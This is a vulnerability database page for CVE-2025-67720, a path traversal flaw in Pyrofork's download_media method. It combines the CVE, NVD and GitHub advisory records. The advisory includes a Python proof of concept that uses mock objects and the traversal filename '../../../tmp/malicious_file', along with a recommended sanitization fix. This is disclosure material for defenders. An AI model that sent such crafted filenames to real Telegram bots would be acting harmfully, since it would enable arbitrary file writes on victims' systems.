Vulnerability-Lookup

CVE-2025-67720 (GCVE-0-2025-67720)

Vulnerability from cvelistv5 – Published: 2025-12-11 01:25 – Updated: 2025-12-11 15:35

Title

Pyrofork has a Path Traversal in download_media Method

Summary

Pyrofork is a modern, asynchronous MTProto API framework. Versions 2.3.68 and earlier do not properly sanitize filenames received from Telegram messages in the download_media method before using them in file path construction. When downloading media, if the user does not specify a custom filename (which is the common/default usage), the method falls back to using the file_name attribute from the media object. The attribute originates from Telegram's DocumentAttributeFilename and is controlled by the message sender. This issue is fixed in version 2.3.69.

Severity

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

SSVC

Exploitation: none Automatable: no Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/Mayuri-Chan/pyrofork/security/…	x_refsource_CONFIRM
https://github.com/Mayuri-Chan/pyrofork/commit/2f…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
Mayuri-Chan	pyrofork	Affected: < 2.3.69

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-67720",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-12-11T15:34:47.033434Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-12-11T15:35:02.068Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "pyrofork",
          "vendor": "Mayuri-Chan",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.3.69"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Pyrofork is a modern, asynchronous MTProto API framework. Versions 2.3.68 and earlier do not properly sanitize filenames received from Telegram messages in the download_media method before using them in file path construction. When downloading media, if the user does not specify a custom filename (which is the common/default usage), the method falls back to using the file_name attribute from the media object. The attribute originates from Telegram\u0027s DocumentAttributeFilename and is controlled by the message sender. This issue is fixed in version 2.3.69."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-11T01:25:46.459Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/Mayuri-Chan/pyrofork/security/advisories/GHSA-6h2f-wjhf-4wjx",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/Mayuri-Chan/pyrofork/security/advisories/GHSA-6h2f-wjhf-4wjx"
        },
        {
          "name": "https://github.com/Mayuri-Chan/pyrofork/commit/2f2d515575cc9c360bd74340a61a1d2b1e1f1f95",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/Mayuri-Chan/pyrofork/commit/2f2d515575cc9c360bd74340a61a1d2b1e1f1f95"
        }
      ],
      "source": {
        "advisory": "GHSA-6h2f-wjhf-4wjx",
        "discovery": "UNKNOWN"
      },
      "title": "Pyrofork has a Path Traversal in download_media Method"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-67720",
    "datePublished": "2025-12-11T01:25:46.459Z",
    "dateReserved": "2025-12-10T18:46:14.762Z",
    "dateUpdated": "2025-12-11T15:35:02.068Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2025-67720",
      "date": "2026-06-05",
      "epss": "0.00048",
      "percentile": "0.15413"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-67720\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-12-11T02:16:19.090\",\"lastModified\":\"2025-12-12T15:18:13.390\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Pyrofork is a modern, asynchronous MTProto API framework. Versions 2.3.68 and earlier do not properly sanitize filenames received from Telegram messages in the download_media method before using them in file path construction. When downloading media, if the user does not specify a custom filename (which is the common/default usage), the method falls back to using the file_name attribute from the media object. The attribute originates from Telegram\u0027s DocumentAttributeFilename and is controlled by the message sender. This issue is fixed in version 2.3.69.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"references\":[{\"url\":\"https://github.com/Mayuri-Chan/pyrofork/commit/2f2d515575cc9c360bd74340a61a1d2b1e1f1f95\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/Mayuri-Chan/pyrofork/security/advisories/GHSA-6h2f-wjhf-4wjx\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-67720\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-12-11T15:34:47.033434Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-12-11T15:34:53.708Z\"}}], \"cna\": {\"title\": \"Pyrofork has a Path Traversal in download_media Method\", \"source\": {\"advisory\": \"GHSA-6h2f-wjhf-4wjx\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"Mayuri-Chan\", \"product\": \"pyrofork\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.3.69\"}]}], \"references\": [{\"url\": \"https://github.com/Mayuri-Chan/pyrofork/security/advisories/GHSA-6h2f-wjhf-4wjx\", \"name\": \"https://github.com/Mayuri-Chan/pyrofork/security/advisories/GHSA-6h2f-wjhf-4wjx\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/Mayuri-Chan/pyrofork/commit/2f2d515575cc9c360bd74340a61a1d2b1e1f1f95\", \"name\": \"https://github.com/Mayuri-Chan/pyrofork/commit/2f2d515575cc9c360bd74340a61a1d2b1e1f1f95\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Pyrofork is a modern, asynchronous MTProto API framework. Versions 2.3.68 and earlier do not properly sanitize filenames received from Telegram messages in the download_media method before using them in file path construction. When downloading media, if the user does not specify a custom filename (which is the common/default usage), the method falls back to using the file_name attribute from the media object. The attribute originates from Telegram\u0027s DocumentAttributeFilename and is controlled by the message sender. This issue is fixed in version 2.3.69.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-12-11T01:25:46.459Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-67720\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-12-11T15:35:02.068Z\", \"dateReserved\": \"2025-12-10T18:46:14.762Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-12-11T01:25:46.459Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2025-67720

Vulnerability from fkie_nvd - Published: 2025-12-11 02:16 - Updated: 2026-04-15 00:35

Severity

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/Mayuri-Chan/pyrofork/commit/2f2d515575cc9c360bd74340a61a1d2b1e1f1f95
	security-advisories@github.com	https://github.com/Mayuri-Chan/pyrofork/security/advisories/GHSA-6h2f-wjhf-4wjx

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Pyrofork is a modern, asynchronous MTProto API framework. Versions 2.3.68 and earlier do not properly sanitize filenames received from Telegram messages in the download_media method before using them in file path construction. When downloading media, if the user does not specify a custom filename (which is the common/default usage), the method falls back to using the file_name attribute from the media object. The attribute originates from Telegram\u0027s DocumentAttributeFilename and is controlled by the message sender. This issue is fixed in version 2.3.69."
    }
  ],
  "id": "CVE-2025-67720",
  "lastModified": "2026-04-15T00:35:42.020",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-12-11T02:16:19.090",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/Mayuri-Chan/pyrofork/commit/2f2d515575cc9c360bd74340a61a1d2b1e1f1f95"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/Mayuri-Chan/pyrofork/security/advisories/GHSA-6h2f-wjhf-4wjx"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-6H2F-WJHF-4WJX

Vulnerability from github – Published: 2025-12-10 20:21 – Updated: 2025-12-11 15:51

Summary

Pyrofork has a Path Traversal in download_media Method

Details

Summary

The download_media method in Pyrofork does not sanitize filenames received from Telegram messages before using them in file path construction. This allows a remote attacker to write files to arbitrary locations on the filesystem by sending a specially crafted document with path traversal sequences (e.g., ../) or absolute paths in the filename.

Details

When downloading media, if the user does not specify a custom filename (which is the common/default usage), the method falls back to using the file_name attribute from the media object. This attribute originates from Telegram's DocumentAttributeFilename and is controlled by the message sender.

Vulnerable Code Path

Step 1: In pyrogram/methods/messages/download_media.py (lines 145-151):

media_file_name = getattr(media, "file_name", "")  # Value from Telegram message

directory, file_name = os.path.split(file_name)    # Split user's path parameter
file_name = file_name or media_file_name or ""     # Falls back to media_file_name if empty

When a user calls download_media(message) or download_media(message, "downloads/"), the os.path.split() returns an empty filename, causing the code to use media_file_name which is attacker-controlled.

Step 2: In pyrogram/client.py (line 1125):

temp_file_path = os.path.abspath(re.sub("\\\\", "/", os.path.join(directory, file_name))) + ".temp"

The os.path.join() function does not prevent path traversal. When file_name contains ../ sequences or is an absolute path, it allows writing outside the intended download directory.

Why the existing `isabs` check is insufficient

The check at line 153 in download_media.py:

if not os.path.isabs(file_name):
    directory = self.PARENT_DIR / (directory or DEFAULT_DOWNLOAD_DIR)

This check only handles absolute paths by skipping the directory prefix, but: 1. For relative paths with ../, os.path.isabs() returns False, so the check doesn't catch it 2. For absolute paths, os.path.join() in the next step will still use the absolute path directly

PoC

The following Python script demonstrates the vulnerability by simulating the exact code logic from download_media.py and client.py:

#!/usr/bin/env python3
"""
Path Traversal PoC for Pyrofork download_media
Demonstrates CWE-22 vulnerability in filename handling
"""

import os
import shutil
import tempfile
from pathlib import Path
from dataclasses import dataclass

@dataclass
class MockDocument:
    """Simulates a Telegram Document with attacker-controlled file_name"""
    file_id: str
    file_name: str  # Attacker-controlled!

@dataclass  
class MockMessage:
    """Simulates a Telegram Message"""
    document: MockDocument

DEFAULT_DOWNLOAD_DIR = "downloads/"

def vulnerable_download_media(parent_dir, message, file_name=DEFAULT_DOWNLOAD_DIR):
    """
    Simulates the vulnerable logic from:
    - pyrogram/methods/messages/download_media.py (lines 145-154)
    - pyrogram/client.py (line 1125)
    """
    media = message.document
    media_file_name = getattr(media, "file_name", "")

    # Line 150-151: Split and fallback
    directory, file_name = os.path.split(file_name)
    file_name = file_name or media_file_name or ""

    # Line 153-154: isabs check (insufficient!)
    if not os.path.isabs(file_name):
        directory = parent_dir / (directory or DEFAULT_DOWNLOAD_DIR)

    if not file_name:
        file_name = "generated_file.bin"

    # Line 1125 in client.py: Path construction
    import re
    temp_file_path = os.path.abspath(
        re.sub("\\\\", "/", os.path.join(str(directory), file_name))
    ) + ".temp"

    return temp_file_path

def run_poc():
    print("=" * 60)
    print("PYROFORK PATH TRAVERSAL PoC")
    print("=" * 60)

    with tempfile.TemporaryDirectory() as temp_base:
        parent_dir = Path(temp_base)
        expected_dir = str(parent_dir / "downloads")

        print(f"\n[*] Bot working directory: {parent_dir}")
        print(f"[*] Expected download dir: {expected_dir}")

        # Attack: Path traversal with ../
        print("\n" + "-" * 60)
        print("TEST: Path Traversal Attack")
        print("-" * 60)

        malicious_msg = MockMessage(
            document=MockDocument(
                file_id="test_id",
                file_name="../../../tmp/malicious_file"
            )
        )

        result_path = vulnerable_download_media(
            parent_dir=parent_dir,
            message=malicious_msg,
            file_name="downloads/"
        )

        # Remove .temp suffix for final path
        final_path = os.path.splitext(result_path)[0]

        print(f"[*] Malicious filename: ../../../tmp/malicious_file")
        print(f"[*] Resulting path: {final_path}")

        if not final_path.startswith(expected_dir):
            print(f"\n[!] VULNERABILITY CONFIRMED")
            print(f"[!] File path escapes intended directory!")
            print(f"[!] Expected: {expected_dir}/...")
            print(f"[!] Actual: {final_path}")
        else:
            print("[*] Path is within expected directory")

if __name__ == "__main__":
    run_poc()

How to Run

Save the above script and run:

python3 poc_script.py

Expected Output

============================================================
PYROFORK PATH TRAVERSAL PoC
============================================================

[*] Bot working directory: /tmp/tmpXXXXXX
[*] Expected download dir: /tmp/tmpXXXXXX/downloads

------------------------------------------------------------
TEST: Path Traversal Attack
------------------------------------------------------------
[*] Malicious filename: ../../../tmp/malicious_file
[*] Resulting path: /tmp/malicious_file

[!] VULNERABILITY CONFIRMED
[!] File path escapes intended directory!
[!] Expected: /tmp/tmpXXXXXX/downloads/...
[!] Actual: /tmp/malicious_file

Why This Proves the Vulnerability

The PoC uses the exact same logic as the vulnerable code in download_media.py and client.py
The malicious filename ../../../tmp/malicious_file causes the path to escape from /tmp/tmpXXX/downloads/ to /tmp/malicious_file
Python's os.path.join() and os.path.abspath() behavior is deterministic - this will work the same way in the real library

Impact

Who is affected?

Telegram bots or user accounts using Pyrofork that download media with default parameters
The common usage pattern await client.download_media(message) is affected

Conditions required for exploitation

Attacker must be able to send messages to the victim's bot/account
Victim must download the media without specifying a custom filename
The bot process must have write permissions to the target location

Potential consequences

Arbitrary file write to locations writable by the bot process
Overwriting existing files could cause denial of service or configuration issues
In specific deployment scenarios, could potentially lead to code execution (e.g., if bot runs with elevated privileges)

Recommended Fix

Add filename sanitization in download_media.py after line 151:

file_name = file_name or media_file_name or ""

# Add this sanitization block:
if file_name:
    # Remove any path components, keeping only the basename
    file_name = os.path.basename(file_name)
    # Remove null bytes which could cause issues
    file_name = file_name.replace('\x00', '')
    # Handle edge cases
    if not file_name or file_name in ('.', '..'):
        file_name = ""

This ensures that only the filename component is used, stripping any directory traversal sequences or absolute paths.

Thank you for your time in reviewing this report. Please let me know if you need any additional information or clarification.

Severity

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.3.68"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "pyrofork"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.69"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-67720"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-10T20:21:54Z",
    "nvd_published_at": "2025-12-11T02:16:19Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe `download_media` method in Pyrofork does not sanitize filenames received from Telegram messages before using them in file path construction. This allows a remote attacker to write files to arbitrary locations on the filesystem by sending a specially crafted document with path traversal sequences (e.g., `../`) or absolute paths in the filename.\n\n---\n\n## Details\n\nWhen downloading media, if the user does not specify a custom filename (which is the common/default usage), the method falls back to using the `file_name` attribute from the media object. This attribute originates from Telegram\u0027s `DocumentAttributeFilename` and is controlled by the message sender.\n\n### Vulnerable Code Path\n\n**Step 1**: In `pyrogram/methods/messages/download_media.py` (lines 145-151):\n\n```python\nmedia_file_name = getattr(media, \"file_name\", \"\")  # Value from Telegram message\n\ndirectory, file_name = os.path.split(file_name)    # Split user\u0027s path parameter\nfile_name = file_name or media_file_name or \"\"     # Falls back to media_file_name if empty\n```\n\nWhen a user calls `download_media(message)` or `download_media(message, \"downloads/\")`, the `os.path.split()` returns an empty filename, causing the code to use `media_file_name` which is attacker-controlled.\n\n**Step 2**: In `pyrogram/client.py` (line 1125):\n\n```python\ntemp_file_path = os.path.abspath(re.sub(\"\\\\\\\\\", \"/\", os.path.join(directory, file_name))) + \".temp\"\n```\n\nThe `os.path.join()` function does not prevent path traversal. When `file_name` contains `../` sequences or is an absolute path, it allows writing outside the intended download directory.\n\n### Why the existing `isabs` check is insufficient\n\nThe check at line 153 in `download_media.py`:\n\n```python\nif not os.path.isabs(file_name):\n    directory = self.PARENT_DIR / (directory or DEFAULT_DOWNLOAD_DIR)\n```\n\nThis check only handles absolute paths by skipping the directory prefix, but:\n1. For relative paths with `../`, `os.path.isabs()` returns `False`, so the check doesn\u0027t catch it\n2. For absolute paths, `os.path.join()` in the next step will still use the absolute path directly\n\n---\n\n## PoC\n\nThe following Python script demonstrates the vulnerability by simulating the exact code logic from `download_media.py` and `client.py`:\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPath Traversal PoC for Pyrofork download_media\nDemonstrates CWE-22 vulnerability in filename handling\n\"\"\"\n\nimport os\nimport shutil\nimport tempfile\nfrom pathlib import Path\nfrom dataclasses import dataclass\n\n@dataclass\nclass MockDocument:\n    \"\"\"Simulates a Telegram Document with attacker-controlled file_name\"\"\"\n    file_id: str\n    file_name: str  # Attacker-controlled!\n\n@dataclass  \nclass MockMessage:\n    \"\"\"Simulates a Telegram Message\"\"\"\n    document: MockDocument\n\nDEFAULT_DOWNLOAD_DIR = \"downloads/\"\n\ndef vulnerable_download_media(parent_dir, message, file_name=DEFAULT_DOWNLOAD_DIR):\n    \"\"\"\n    Simulates the vulnerable logic from:\n    - pyrogram/methods/messages/download_media.py (lines 145-154)\n    - pyrogram/client.py (line 1125)\n    \"\"\"\n    media = message.document\n    media_file_name = getattr(media, \"file_name\", \"\")\n    \n    # Line 150-151: Split and fallback\n    directory, file_name = os.path.split(file_name)\n    file_name = file_name or media_file_name or \"\"\n    \n    # Line 153-154: isabs check (insufficient!)\n    if not os.path.isabs(file_name):\n        directory = parent_dir / (directory or DEFAULT_DOWNLOAD_DIR)\n    \n    if not file_name:\n        file_name = \"generated_file.bin\"\n    \n    # Line 1125 in client.py: Path construction\n    import re\n    temp_file_path = os.path.abspath(\n        re.sub(\"\\\\\\\\\", \"/\", os.path.join(str(directory), file_name))\n    ) + \".temp\"\n    \n    return temp_file_path\n\ndef run_poc():\n    print(\"=\" * 60)\n    print(\"PYROFORK PATH TRAVERSAL PoC\")\n    print(\"=\" * 60)\n    \n    with tempfile.TemporaryDirectory() as temp_base:\n        parent_dir = Path(temp_base)\n        expected_dir = str(parent_dir / \"downloads\")\n        \n        print(f\"\\n[*] Bot working directory: {parent_dir}\")\n        print(f\"[*] Expected download dir: {expected_dir}\")\n        \n        # Attack: Path traversal with ../\n        print(\"\\n\" + \"-\" * 60)\n        print(\"TEST: Path Traversal Attack\")\n        print(\"-\" * 60)\n        \n        malicious_msg = MockMessage(\n            document=MockDocument(\n                file_id=\"test_id\",\n                file_name=\"../../../tmp/malicious_file\"\n            )\n        )\n        \n        result_path = vulnerable_download_media(\n            parent_dir=parent_dir,\n            message=malicious_msg,\n            file_name=\"downloads/\"\n        )\n        \n        # Remove .temp suffix for final path\n        final_path = os.path.splitext(result_path)[0]\n        \n        print(f\"[*] Malicious filename: ../../../tmp/malicious_file\")\n        print(f\"[*] Resulting path: {final_path}\")\n        \n        if not final_path.startswith(expected_dir):\n            print(f\"\\n[!] VULNERABILITY CONFIRMED\")\n            print(f\"[!] File path escapes intended directory!\")\n            print(f\"[!] Expected: {expected_dir}/...\")\n            print(f\"[!] Actual: {final_path}\")\n        else:\n            print(\"[*] Path is within expected directory\")\n\nif __name__ == \"__main__\":\n    run_poc()\n```\n\n### How to Run\n\nSave the above script and run:\n\n```bash\npython3 poc_script.py\n```\n\n### Expected Output\n\n```\n============================================================\nPYROFORK PATH TRAVERSAL PoC\n============================================================\n\n[*] Bot working directory: /tmp/tmpXXXXXX\n[*] Expected download dir: /tmp/tmpXXXXXX/downloads\n\n------------------------------------------------------------\nTEST: Path Traversal Attack\n------------------------------------------------------------\n[*] Malicious filename: ../../../tmp/malicious_file\n[*] Resulting path: /tmp/malicious_file\n\n[!] VULNERABILITY CONFIRMED\n[!] File path escapes intended directory!\n[!] Expected: /tmp/tmpXXXXXX/downloads/...\n[!] Actual: /tmp/malicious_file\n```\n\n### Why This Proves the Vulnerability\n\n1. The PoC uses the **exact same logic** as the vulnerable code in `download_media.py` and `client.py`\n2. The malicious filename `../../../tmp/malicious_file` causes the path to escape from `/tmp/tmpXXX/downloads/` to `/tmp/malicious_file`\n3. Python\u0027s `os.path.join()` and `os.path.abspath()` behavior is deterministic - this will work the same way in the real library\n\n---\n\n## Impact\n\n### Who is affected?\n\n- Telegram bots or user accounts using Pyrofork that download media with default parameters\n- The common usage pattern `await client.download_media(message)` is affected\n\n### Conditions required for exploitation\n\n1. Attacker must be able to send messages to the victim\u0027s bot/account\n2. Victim must download the media without specifying a custom filename\n3. The bot process must have write permissions to the target location\n\n### Potential consequences\n\n- **Arbitrary file write** to locations writable by the bot process\n- Overwriting existing files could cause denial of service or configuration issues\n- In specific deployment scenarios, could potentially lead to code execution (e.g., if bot runs with elevated privileges)\n\n---\n\n## Recommended Fix\n\nAdd filename sanitization in `download_media.py` after line 151:\n\n```python\nfile_name = file_name or media_file_name or \"\"\n\n# Add this sanitization block:\nif file_name:\n    # Remove any path components, keeping only the basename\n    file_name = os.path.basename(file_name)\n    # Remove null bytes which could cause issues\n    file_name = file_name.replace(\u0027\\x00\u0027, \u0027\u0027)\n    # Handle edge cases\n    if not file_name or file_name in (\u0027.\u0027, \u0027..\u0027):\n        file_name = \"\"\n```\n\nThis ensures that only the filename component is used, stripping any directory traversal sequences or absolute paths.\n\n---\n\nThank you for your time in reviewing this report. Please let me know if you need any additional information or clarification.",
  "id": "GHSA-6h2f-wjhf-4wjx",
  "modified": "2025-12-11T15:51:44Z",
  "published": "2025-12-10T20:21:54Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Mayuri-Chan/pyrofork/security/advisories/GHSA-6h2f-wjhf-4wjx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67720"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Mayuri-Chan/pyrofork/commit/2f2d515575cc9c360bd74340a61a1d2b1e1f1f95"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Mayuri-Chan/pyrofork"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Pyrofork has a Path Traversal in download_media Method"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-67720 (GCVE-0-2025-67720)

FKIE_CVE-2025-67720

GHSA-6H2F-WJHF-4WJX

Summary

Details

Vulnerable Code Path

Why the existing isabs check is insufficient

PoC

How to Run

Expected Output

Why This Proves the Vulnerability

Impact

Who is affected?

Conditions required for exploitation

Potential consequences

Recommended Fix

Tags

Sightings

Nomenclature

Why the existing `isabs` check is insufficient